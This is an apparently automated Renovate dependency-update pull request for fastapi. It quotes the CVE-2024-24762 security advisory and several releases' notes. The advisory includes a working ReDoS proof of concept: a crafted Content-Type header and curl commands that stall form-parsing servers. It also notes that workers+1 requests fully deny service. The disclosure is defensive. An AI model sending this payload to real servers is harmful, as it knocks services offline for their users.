Update dependency fastapi to <=0.109.1 [SECURITY] - autoclosed

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
fastapi (changelog)	<=0.103.1 -> <=0.109.1

GitHub Vulnerability Alerts

CVE-2024-24762

Summary

When using form data, python-multipart uses a Regular Expression to parse the HTTP Content-Type header, including options.

An attacker could send a custom-made Content-Type option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.

This can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

This only applies when the app uses form data, parsed with python-multipart.

Details

A regular HTTP Content-Type header could look like:

Content-Type: text/html; charset=utf-8

python-multipart parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74

A custom option could be made and sent to the server to break it with:

Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

PoC

Create a simple WSGI application, that just parses the Content-Type, and run it with python main.py:

# main.py
from wsgiref.simple_server import make_server
from wsgiref.validate import validator

from multipart.multipart import parse_options_header

def simple_app(environ, start_response):
    _, _ = parse_options_header(environ["CONTENT_TYPE"])

    start_response("200 OK", [("Content-type", "text/plain")])
    return [b"Ok"]

httpd = make_server("", 8123, validator(simple_app))
print("Serving on port 8123...")
httpd.serve_forever()

Then send the attacking request with:

$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'

Impact

It's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data. This way it also affects other libraries using Starlette, like FastAPI.

Original Report

This was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r

Original report to FastAPI

Hey Tiangolo!

My name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @​nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).

Here are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:

from typing import Annotated
from fastapi.responses import HTMLResponse
from fastapi import FastAPI,Form
from pydantic import BaseModel

class Item(BaseModel):
    username: str

app = FastAPI()

@​app.get("/", response_class=HTMLResponse)
async def index():
    return HTMLResponse("Test", status_code=200)

@​app.post("/submit/")
async def submit(username: Annotated[str, Form()]):
    return {"username": username}

@​app.post("/submit_json/")
async def submit_json(item: Item):
    return {"username": item.username}

I'm running the above with uvicorn with the following command:

uvicorn server:app

Then run the following cUrl command:

curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'

You'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%

You can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.

If you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.

Cheers

Impact

An attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.

Occurrences

params.py L586

---

Release Notes

fastapi/fastapi (fastapi)

v0.109.1

Compare Source

Security fixes

• ⬆️ Upgrade minimum version of python-multipart to >=0.0.7 to fix a vulnerability when using form data with a ReDos attack. You can also simply upgrade python-multipart.

Read more in the advisory: Content-Type Header ReDoS.

Features

• ✨ Include HTTP 205 in status codes with no body. PR #​10969 by @​tiangolo.

Refactors

• ✅ Refactor tests for duplicate operation ID generation for compatibility with other tools running the FastAPI test suite. PR #​10876 by @​emmettbutler.
• ♻️ Simplify string format with f-strings in fastapi/utils.py. PR #​10576 by @​eukub.
• 🔧 Fix Ruff configuration unintentionally enabling and re-disabling mccabe complexity check. PR #​10893 by @​jiridanek.
• ✅ Re-enable test in tests/test_tutorial/test_header_params/test_tutorial003.py after fix in Starlette. PR #​10904 by @​ooknimm.

Docs

• 📝 Tweak wording in help-fastapi.md. PR #​11040 by @​tiangolo.
• 📝 Tweak docs for Behind a Proxy. PR #​11038 by @​tiangolo.
• 📝 Add External Link: 10 Tips for adding SQLAlchemy to FastAPI. PR #​11036 by @​Donnype.
• 📝 Add External Link: Tips on migrating from Flask to FastAPI and vice-versa. PR #​11029 by @​jtemporal.
• 📝 Deprecate old tutorials: Peewee, Couchbase, encode/databases. PR #​10979 by @​tiangolo.
• ✏️ Fix typo in fastapi/security/oauth2.py. PR #​10972 by @​RafalSkolasinski.
• 📝 Update HTTPException details in docs/en/docs/tutorial/handling-errors.md. PR #​5418 by @​papb.
• ✏️ A few tweaks in docs/de/docs/tutorial/first-steps.md. PR #​10959 by @​nilslindemann.
• ✏️ Fix link in docs/en/docs/advanced/async-tests.md. PR #​10960 by @​nilslindemann.
• ✏️ Fix typos for Spanish documentation. PR #​10957 by @​jlopezlira.
• 📝 Add warning about lifespan functions and backwards compatibility with events. PR #​10734 by @​jacob-indigo.
• ✏️ Fix broken link in docs/tutorial/sql-databases.md in several languages. PR #​10716 by @​theoohoho.
• ✏️ Remove broken links from external_links.yml. PR #​10943 by @​Torabek.
• 📝 Update template docs with more info about url_for. PR #​5937 by @​EzzEddin.
• 📝 Update usage of Token model in security docs. PR #​9313 by @​piotrszacilowski.
• ✏️ Update highlighted line in docs/en/docs/tutorial/bigger-applications.md. PR #​5490 by @​papb.
• 📝 Add External Link: Explore How to Effectively Use JWT With FastAPI. PR #​10212 by @​aanchlia.
• 📝 Add hyperlink to docs/en/docs/tutorial/static-files.md. PR #​10243 by @​hungtsetse.
• 📝 Add External Link: Instrument a FastAPI service adding tracing with OpenTelemetry and send/show traces in Grafana Tempo. PR #​9440 by @​softwarebloat.
• 📝 Review and rewording of en/docs/contributing.md. PR #​10480 by @​nilslindemann.
• 📝 Add External Link: ML serving and monitoring with FastAPI and Evidently. PR #​9701 by @​mnrozhkov.
• 📝 Reword in docs, from "have in mind" to "keep in mind". PR #​10376 by @​malicious.
• 📝 Add External Link: Talk by Jeny Sadadia. PR #​10265 by @​JenySadadia.
• 📝 Add location info to tutorial/bigger-applications.md. PR #​10552 by @​nilslindemann.
• ✏️ Fix Pydantic method name in docs/en/docs/advanced/path-operation-advanced-configuration.md. PR #​10826 by @​ahmedabdou14.

Translations

• 🌐 Add Spanish translation for docs/es/docs/external-links.md. PR #​10933 by @​pablocm83.
• 🌐 Update Korean translation for docs/ko/docs/tutorial/first-steps.md, docs/ko/docs/tutorial/index.md, docs/ko/docs/tutorial/path-params.md, and docs/ko/docs/tutorial/query-params.md. PR #​4218 by @​SnowSuno.
• 🌐 Add Chinese translation for docs/zh/docs/tutorial/dependencies/dependencies-with-yield.md. PR #​10870 by @​zhiquanchi.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/concepts.md. PR #​10282 by @​xzmeng.
• 🌐 Add Azerbaijani translation for docs/az/docs/index.md. PR #​11047 by @​aykhans.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/middleware.md. PR #​2829 by @​JeongHyeongKim.
• 🌐 Add German translation for docs/de/docs/tutorial/body-nested-models.md. PR #​10313 by @​nilslindemann.
• 🌐 Add Persian translation for docs/fa/docs/tutorial/middleware.md. PR #​9695 by @​mojtabapaso.
• 🌐 Update Farsi translation for docs/fa/docs/index.md. PR #​10216 by @​theonlykingpin.
• 🌐 Add German translation for docs/de/docs/tutorial/body-fields.md. PR #​10310 by @​nilslindemann.
• 🌐 Add German translation for docs/de/docs/tutorial/body.md. PR #​10295 by @​nilslindemann.
• 🌐 Add German translation for docs/de/docs/tutorial/body-multiple-params.md. PR #​10308 by @​nilslindemann.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/security/get-current-user.md. PR #​2681 by @​sh0nk.
• 🌐 Add Chinese translation for docs/zh/docs/advanced/advanced-dependencies.md. PR #​3798 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/advanced/events.md. PR #​3815 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/advanced/behind-a-proxy.md. PR #​3820 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/advanced/testing-events.md. PR #​3818 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/advanced/testing-websockets.md. PR #​3817 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/advanced/testing-database.md. PR #​3821 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/deta.md. PR #​3837 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/history-design-future.md. PR #​3832 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/project-generation.md. PR #​3831 by @​jaystone776.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/docker.md. PR #​10296 by @​xzmeng.
• 🌐 Update Spanish translation for docs/es/docs/features.md. PR #​10884 by @​pablocm83.
• 🌐 Add Spanish translation for docs/es/docs/newsletter.md. PR #​10922 by @​pablocm83.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/background-tasks.md. PR #​5910 by @​junah201.
• 🌐 Add Turkish translation for docs/tr/docs/alternatives.md. PR #​10502 by @​alperiox.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/dependencies/index.md. PR #​10989 by @​KaniKim.
• 🌐 Add Korean translation for /docs/ko/docs/tutorial/body.md. PR #​11000 by @​KaniKim.
• 🌐 Add Portuguese translation for docs/pt/docs/tutorial/schema-extra-example.md. PR #​4065 by @​luccasmmg.
• 🌐 Add Turkish translation for docs/tr/docs/history-design-future.md. PR #​11012 by @​hasansezertasan.
• 🌐 Add Turkish translation for docs/tr/docs/resources/index.md. PR #​11020 by @​hasansezertasan.
• 🌐 Add Turkish translation for docs/tr/docs/how-to/index.md. PR #​11021 by @​hasansezertasan.
• 🌐 Add German translation for docs/de/docs/tutorial/query-params.md. PR #​10293 by @​nilslindemann.
• 🌐 Add German translation for docs/de/docs/benchmarks.md. PR #​10866 by @​nilslindemann.
• 🌐 Add Turkish translation for docs/tr/docs/learn/index.md. PR #​11014 by @​hasansezertasan.
• 🌐 Add Persian translation for docs/fa/docs/tutorial/security/index.md. PR #​9945 by @​mojtabapaso.
• 🌐 Add Turkish translation for docs/tr/docs/help/index.md. PR #​11013 by @​hasansezertasan.
• 🌐 Add Turkish translation for docs/tr/docs/about/index.md. PR #​11006 by @​hasansezertasan.
• 🌐 Update Turkish translation for docs/tr/docs/benchmarks.md. PR #​11005 by @​hasansezertasan.
• 🌐 Add Italian translation for docs/it/docs/index.md. PR #​5233 by @​matteospanio.
• 🌐 Add Korean translation for docs/ko/docs/help/index.md. PR #​10983 by @​KaniKim.
• 🌐 Add Korean translation for docs/ko/docs/features.md. PR #​10976 by @​KaniKim.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/security/get-current-user.md. PR #​5737 by @​KdHyeon0661.
• 🌐 Add Russian translation for docs/ru/docs/tutorial/security/first-steps.md. PR #​10541 by @​AlertRED.
• 🌐 Add Russian translation for docs/ru/docs/tutorial/handling-errors.md. PR #​10375 by @​AlertRED.
• 🌐 Add Russian translation for docs/ru/docs/tutorial/encoder.md. PR #​10374 by @​AlertRED.
• 🌐 Add Russian translation for docs/ru/docs/tutorial/body-updates.md. PR #​10373 by @​AlertRED.
• 🌐 Russian translation: updated fastapi-people.md.. PR #​10255 by @​NiKuma0.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/security/index.md. PR #​5798 by @​3w36zj6.
• 🌐 Add German translation for docs/de/docs/advanced/generate-clients.md. PR #​10725 by @​nilslindemann.
• 🌐 Add German translation for docs/de/docs/advanced/openapi-webhooks.md. PR #​10712 by @​nilslindemann.
• 🌐 Add German translation for docs/de/docs/advanced/custom-response.md. PR #​10624 by @​nilslindemann.
• 🌐 Add German translation for docs/de/docs/advanced/additional-status-codes.md. PR #​10617 by @​nilslindemann.
• 🌐 Add German translation for docs/de/docs/tutorial/middleware.md. PR #​10391 by @​JohannesJungbluth.
• 🌐 Add German translation for introduction documents. PR #​10497 by @​nilslindemann.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/encoder.md. PR #​1955 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/extra-data-types.md. PR #​1932 by @​SwftAlpc.
• 🌐 Add Turkish translation for docs/tr/docs/async.md. PR #​5191 by @​BilalAlpaslan.
• 🌐 Add Turkish translation for docs/tr/docs/project-generation.md. PR #​5192 by @​BilalAlpaslan.
• 🌐 Add Korean translation for docs/ko/docs/deployment/docker.md. PR #​5657 by @​nearnear.
• 🌐 Add Korean translation for docs/ko/docs/deployment/server-workers.md. PR #​4935 by @​jujumilk3.
• 🌐 Add Korean translation for docs/ko/docs/deployment/index.md. PR #​4561 by @​jujumilk3.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/path-operation-configuration.md. PR #​3639 by @​jungsu-kwon.
• 🌐 Modify the description of zh - Traditional Chinese. PR #​10889 by @​cherinyy.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/static-files.md. PR #​2957 by @​jeesang7.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/response-model.md. PR #​2766 by @​hard-coders.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/body-multiple-params.md. PR #​2461 by @​PandaHun.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/query-params-str-validations.md. PR #​2415 by @​hard-coders.
• 🌐 Add Korean translation for docs/ko/docs/python-types.md. PR #​2267 by @​jrim.
• 🌐 Add Korean translation for docs/ko/docs/tutorial/body-nested-models.md. PR #​2506 by @​hard-coders.
• 🌐 Add Korean translation for docs/ko/docs/learn/index.md. PR #​10977 by @​KaniKim.
• 🌐 Initialize translations for Traditional Chinese. PR #​10505 by @​hsuanchi.
• ✏️ Tweak the german translation of docs/de/docs/tutorial/index.md. PR #​10962 by @​nilslindemann.
• ✏️ Fix typo error in docs/ko/docs/tutorial/path-params.md. PR #​10758 by @​2chanhaeng.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/dependencies/dependencies-with-yield.md. PR #​1961 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/dependencies/dependencies-in-path-operation-decorators.md. PR #​1960 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/dependencies/sub-dependencies.md. PR #​1959 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/background-tasks.md. PR #​2668 by @​tokusumi.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/dependencies/index.md and docs/ja/docs/tutorial/dependencies/classes-as-dependencies.md. PR #​1958 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/response-model.md. PR #​1938 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/body-multiple-params.md. PR #​1903 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/path-params-numeric-validations.md. PR #​1902 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/python-types.md. PR #​1899 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/handling-errors.md. PR #​1953 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/response-status-code.md. PR #​1942 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/extra-models.md. PR #​1941 by @​SwftAlpc.
• 🌐 Add Japanese tranlsation for docs/ja/docs/tutorial/schema-extra-example.md. PR #​1931 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/body-nested-models.md. PR #​1930 by @​SwftAlpc.
• 🌐 Add Japanese translation for docs/ja/docs/tutorial/body-fields.md. PR #​1923 by @​SwftAlpc.
• 🌐 Add German translation for docs/de/docs/tutorial/index.md. PR #​9502 by @​fhabers21.
• 🌐 Add German translation for docs/de/docs/tutorial/background-tasks.md. PR #​10566 by @​nilslindemann.
• ✏️ Fix typo in docs/ru/docs/index.md. PR #​10672 by @​Delitel-WEB.
• ✏️ Fix typos in docs/zh/docs/tutorial/extra-data-types.md. PR #​10727 by @​HiemalBeryl.
• 🌐 Add Russian translation for docs/ru/docs/tutorial/dependencies/classes-as-dependencies.md. PR #​10410 by @​AlertRED.

Internal

• 👥 Update FastAPI People. PR #​11074 by @​tiangolo.
• 🔧 Update sponsors: add Coherence. PR #​11066 by @​tiangolo.
• 👷 Upgrade GitHub Action issue-manager. PR #​11056 by @​tiangolo.
• 🍱 Update sponsors: TalkPython badge. PR #​11052 by @​tiangolo.
• 🔧 Update sponsors: TalkPython badge image. PR #​11048 by @​tiangolo.
• 🔧 Update sponsors, remove Deta. PR #​11041 by @​tiangolo.
• 💄 Fix CSS breaking RTL languages (erroneously introduced by a previous RTL PR). PR #​11039 by @​tiangolo.
• 🔧 Add Italian to mkdocs.yml. PR #​11016 by @​alejsdev.
• 🔨 Verify mkdocs.yml languages in CI, update docs.py. PR #​11009 by @​tiangolo.
• 🔧 Update config in label-approved.yml to accept translations with 1 reviewer. PR #​11007 by @​alejsdev.
• 👷 Add changes-requested handling in GitHub Action issue manager. PR #​10971 by @​tiangolo.
• 🔧 Group dependencies on dependabot updates. PR #​10952 by @​Kludex.
• ⬆ Bump actions/setup-python from 4 to 5. PR #​10764 by @​dependabot[bot].
• ⬆ Bump pypa/gh-action-pypi-publish from 1.8.10 to 1.8.11. PR #​10731 by @​dependabot[bot].
• ⬆ Bump dawidd6/action-download-artifact from 2.28.0 to 3.0.0. PR #​10777 by @​dependabot[bot].
• 🔧 Add support for translations to languages with a longer code name, like zh-hant. PR #​10950 by @​tiangolo.

v0.109.0

Compare Source

Features

• ✨ Add support for Python 3.12. PR #​10666 by @​Jamim.

Upgrades

• ⬆️ Upgrade Starlette to >=0.29.0,<0.33.0, update docs and usage of templates with new Starlette arguments. Remove pin of AnyIO >=3.7.1,<4.0.0, add support for AnyIO 4.x.x. PR #​10846 by @​tiangolo.

Docs

• ✏️ Fix typo in docs/en/docs/alternatives.md. PR #​10931 by @​s111d.
• 📝 Replace email with username in docs_src/security/tutorial007 code examples. PR #​10649 by @​nilslindemann.
• 📝 Add VS Code tutorial link. PR #​10592 by @​nilslindemann.
• 📝 Add notes about Pydantic v2's new .model_dump(). PR #​10929 by @​tiangolo.
• 📝 Fix broken link in docs/en/docs/tutorial/sql-databases.md. PR #​10765 by @​HurSungYun.
• 📝 Add External Link: FastAPI application monitoring made easy. PR #​10917 by @​tiangolo.
• ✨ Generate automatic language names for docs translations. PR #​5354 by @​jakul.
• ✏️ Fix typos in docs/en/docs/alternatives.md and docs/en/docs/tutorial/dependencies/index.md. PR #​10906 by @​s111d.
• ✏️ Fix typos in docs/en/docs/tutorial/dependencies/dependencies-with-yield.md. PR #​10834 by @​Molkree.
• 📝 Add article: "Building a RESTful API with FastAPI: Secure Signup and Login Functionality Included". PR #​9733 by @​dxphilo.
• 📝 Add warning about lifecycle events with AsyncClient. PR #​4167 by @​andrew-chang-dewitt.
• ✏️ Fix typos in /docs/reference/exceptions.md and /en/docs/reference/status.md. PR #​10809 by @​clarencepenz.
• ✏️ Fix typo in openapi-callbacks.md. PR #​10673 by @​kayjan.
• ✏️ Fix typo in fastapi/routing.py . PR #​10520 by @​sepsh.
• 📝 Replace HTTP code returned in case of existing user error in docs for testing. PR #​4482 by @​TristanMarion.
• 📝 Add blog for FastAPI & Supabase. PR #​6018 by @​theinfosecguy.
• 📝 Update example source files for SQL databases with SQLAlchemy. PR #​9508 by @​s-mustafa.
• 📝 Update code examples in docs for body, replace name create_item with update_item when appropriate. PR #​5913 by @​OttoAndrey.
• ✏️ Fix typo in dependencies with yield source examples. PR #​10847 by @​tiangolo.

Translations

• 🌐 Add Bengali translation for docs/bn/docs/index.md. PR #​9177 by @​Fahad-Md-Kamal.
• ✏️ Update Python version in index.md in several languages. PR #​10711 by @​tamago3keran.
• 🌐 Add Russian translation for docs/ru/docs/tutorial/request-forms-and-files.md. PR #​10347 by @​AlertRED.
• 🌐 Add Ukrainian translation for docs/uk/docs/index.md. PR #​10362 by @​rostik1410.
• ✏️ Update Python version in docs/ko/docs/index.md. PR #​10680 by @​Eeap.
• 🌐 Add Persian translation for docs/fa/docs/features.md. PR #​5887 by @​amirilf.
• 🌐 Add Chinese translation for docs/zh/docs/advanced/additional-responses.md. PR #​10325 by @​ShuibeiC.
• 🌐 Fix typos in Russian translations for docs/ru/docs/tutorial/background-tasks.md, docs/ru/docs/tutorial/body-nested-models.md, docs/ru/docs/tutorial/debugging.md, docs/ru/docs/tutorial/testing.md. PR #​10311 by @​AlertRED.
• 🌐 Add Russian translation for docs/ru/docs/tutorial/request-files.md. PR #​10332 by @​AlertRED.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/server-workers.md. PR #​10292 by @​xzmeng.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/cloud.md. PR #​10291 by @​xzmeng.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/manually.md. PR #​10279 by @​xzmeng.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/https.md. PR #​10277 by @​xzmeng.
• 🌐 Add Chinese translation for docs/zh/docs/deployment/index.md. PR #​10275 by @​xzmeng.
• 🌐 Add German translation for docs/de/docs/tutorial/first-steps.md. PR #​9530 by @​fhabers21.
• 🌐 Update Turkish translation for docs/tr/docs/index.md. PR #​10444 by @​hasansezertasan.
• 🌐 Add Chinese translation for docs/zh/docs/learn/index.md. PR #​10479 by @​KAZAMA-DREAM.
• 🌐 Add Russian translation for docs/ru/docs/learn/index.md. PR #​10539 by @​AlertRED.
• 🌐 Update SQLAlchemy instruction in Chinese translation docs/zh/docs/tutorial/sql-databases.md. PR #​9712 by @​Royc30ne.
• 🌐 Add Turkish translation for docs/tr/docs/external-links.md. PR #​10549 by @​hasansezertasan.
• 🌐 Add Spanish translation for docs/es/docs/learn/index.md. PR #​10885 by @​pablocm83.
• 🌐 Add Ukrainian translation for docs/uk/docs/tutorial/body-fields.md. PR #​10670 by @​ArtemKhymenko.
• 🌐 Add Hungarian translation for /docs/hu/docs/index.md. PR #​10812 by @​takacs.
• 🌐 Add Turkish translation for docs/tr/docs/newsletter.md. PR #​10550 by @​hasansezertasan.
• 🌐 Add Spanish translation for docs/es/docs/help/index.md. PR #​10907 by @​pablocm83.
• 🌐 Add Spanish translation for docs/es/docs/about/index.md. PR #​10908 by @​pablocm83.
• 🌐 Add Spanish translation for docs/es/docs/resources/index.md. PR #​10909 by @​pablocm83.

Internal

• 👥 Update FastAPI People. PR #​10871 by @​tiangolo.
• 👷 Upgrade custom GitHub Action comment-docs-preview-in-pr. PR #​10916 by @​tiangolo.
• ⬆️ Upgrade GitHub Action latest-changes. PR #​10915 by @​tiangolo.
• 👷 Upgrade GitHub Action label-approved. PR #​10913 by @​tiangolo.
• ⬆️ Upgrade GitHub Action label-approved. PR #​10905 by @​tiangolo.

v0.108.0

Compare Source

Upgrades

• ⬆️ Upgrade Starlette to >=0.29.0,<0.33.0, update docs and usage of templates with new Starlette arguments. PR #​10846 by @​tiangolo.

v0.107.0

Compare Source

Upgrades

• ⬆️ Upgrade Starlette to 0.28.0. PR #​9636 by @​adriangb.

Docs

• 📝 Add docs: Node.js script alternative to update OpenAPI for generated clients. PR #​10845 by @​alejsdev.
• 📝 Restructure Docs section in Contributing page. PR #​10844 by @​alejsdev.

v0.106.0

Compare Source

Breaking Changes

Using resources from dependencies with yield in background tasks is no longer supported.

This change is what supports the new features, read below. 🤓

Dependencies with yield, HTTPException and Background Tasks

Dependencies with yield now can raise HTTPException and other exceptions after yield. 🎉

Read the new docs here: Dependencies with yield and HTTPException.

from fastapi import Depends, FastAPI, HTTPException
from typing_extensions import Annotated

app = FastAPI()

data = {
    "plumbus": {"description": "Freshly pickled plumbus", "owner": "Morty"},
    "portal-gun": {"description": "Gun to create portals", "owner": "Rick"},
}

class OwnerError(Exception):
    pass

def get_username():
    try:
        yield "Rick"
    except OwnerError as e:
        raise HTTPException(status_code=400, detail=f"Onwer error: {e}")

@​app.get("/items/{item_id}")
def get_item(item_id: str, username: Annotated[str, Depends(get_username)]):
    if item_id not in data:
        raise HTTPException(status_code=404, detail="Item not found")
    item = data[item_id]
    if item["owner"] != username:
        raise OwnerError(username)
    return item

---

Before FastAPI 0.106.0, raising exceptions after yield was not possible, the exit code in dependencies with yield was executed after the response was sent, so Exception Handlers would have already run.

This was designed this way mainly to allow using the same objects "yielded" by dependencies inside of background tasks, because the exit code would be executed after the background tasks were finished.

Nevertheless, as this would mean waiting for the response to travel through the network while unnecessarily holding a resource in a dependency with yield (for example a database connection), this was changed in FastAPI 0.106.0.

Additionally, a background task is normally an independent set of logic that should be handled separately, with its own resources (e.g. its own database connection).

If you used to rely on this behavior, now you should create the resources for background tasks inside the background task itself, and use internally only data that doesn't depend on the resources of dependencies with yield.

For example, instead of using the same database session, you would create a new database session inside of the background task, and you would obtain the objects from the database using this new session. And then instead of passing the object from the database as a parameter to the background task function, you would pass the ID of that object and then obtain the object again inside the background task function.

The sequence of execution before FastAPI 0.106.0 was like the diagram in the Release Notes for FastAPI 0.106.0.

The new execution flow can be found in the docs: Execution of dependencies with yield.

v0.105.0

Compare Source

Features

• ✨ Add support for multiple Annotated annotations, e.g. Annotated[str, Field(), Query()]. PR #​10773 by @​tiangolo.

Refactors

• 🔥 Remove unused NoneType. PR #​10774 by @​tiangolo.

Docs

• 📝 Tweak default suggested configs for generating clients. PR #​10736 by @​tiangolo.

Internal

• 🔧 Update sponsors, add Scalar. PR #​10728 by @​tiangolo.
• 🔧 Update sponsors, add PropelAuth. PR #​10760 by @​tiangolo.
• 👷 Update build docs, verify README on CI. PR #​10750 by @​tiangolo.
• 🔧 Update sponsors, remove Fern. PR #​10729 by @​tiangolo.
• 🔧 Update sponsors, add Codacy. PR #​10677 by @​tiangolo.
• 🔧 Update sponsors, add Reflex. PR #​10676 by @​tiangolo.
• 📝 Update release notes, move and check latest-changes. PR #​10588 by @​tiangolo.
• 👷 Upgrade latest-changes GitHub Action. PR #​10587 by @​tiangolo.

v0.104.1

Compare Source

Fixes

• 📌 Pin Swagger UI version to 5.9.0 temporarily to handle a bug crashing it in 5.9.1. PR #​10529 by @​alejandraklachquin.
  • This is not really a bug in FastAPI but in Swagger UI, nevertheless pinning the version will work while a solution is found on the Swagger UI side.

Docs

• 📝 Update data structure and render for external-links. PR #​10495 by @​tiangolo.
• ✏️ Fix link to SPDX license identifier in docs/en/docs/tutorial/metadata.md. PR #​10433 by @​worldworm.
• 📝 Update example validation error from Pydantic v1 to match Pydantic v2 in docs/en/docs/tutorial/path-params.md. PR #​10043 by @​giuliowaitforitdavide.
• ✏️ Fix typos in emoji docs and in some source examples. PR #​10438 by @​afuetterer.
• ✏️ Fix typo in docs/en/docs/reference/dependencies.md. PR #​10465 by @​suravshresth.
• ✏️ Fix typos and rewordings in docs/en/docs/tutorial/body-nested-models.md. PR #​10468 by @​yogabonito.
• 📝 Update docs, remove references to removed pydantic.Required in docs/en/docs/tutorial/query-params-str-validations.md. PR #​10469 by @​yogabonito.
• ✏️ Fix typo in docs/en/docs/reference/index.md. PR #​10467 by @​tarsil.
• 🔥 Remove unnecessary duplicated docstrings. PR #​10484 by @​tiangolo.

Internal

• ✏️ Update Pydantic links to dotenv support. PR #​10511 by @​White-Mask.
• ✏️ Update links in docs/en/docs/async.md and docs/zh/docs/async.md to make them relative. PR #​10498 by @​hasnatsajid.
• ✏️ Fix links in docs/em/docs/async.md. PR #​10507 by @​hasnatsajid.
• ✏️ Fix typo in docs/em/docs/index.md, Python 3.8. PR #​10521 by @​kerriop.
• ⬆ Bump pillow from 9.5.0 to 10.1.0. PR #​10446 by @​dependabot[bot].
• ⬆ Update mkdocs-material requirement from <9.0.0,>=8.1.4 to >=8.1.4,<10.0.0. PR #​5862 by @​dependabot[bot].
• ⬆ Bump mkdocs-material from 9.1.21 to 9.4.7. PR #​10545 by @​dependabot[bot].
• 👷 Install MkDocs Material Insiders only when secrets are available, for Dependabot. PR #​10544 by @​tiangolo.
• 🔧 Update sponsors badges, Databento. PR #​10519 by @​tiangolo.
• 👷 Adopt Ruff format. PR #​10517 by @​tiangolo.
• 🔧 Add CITATION.cff file for academic citations. PR #​10496 by @​tiangolo.
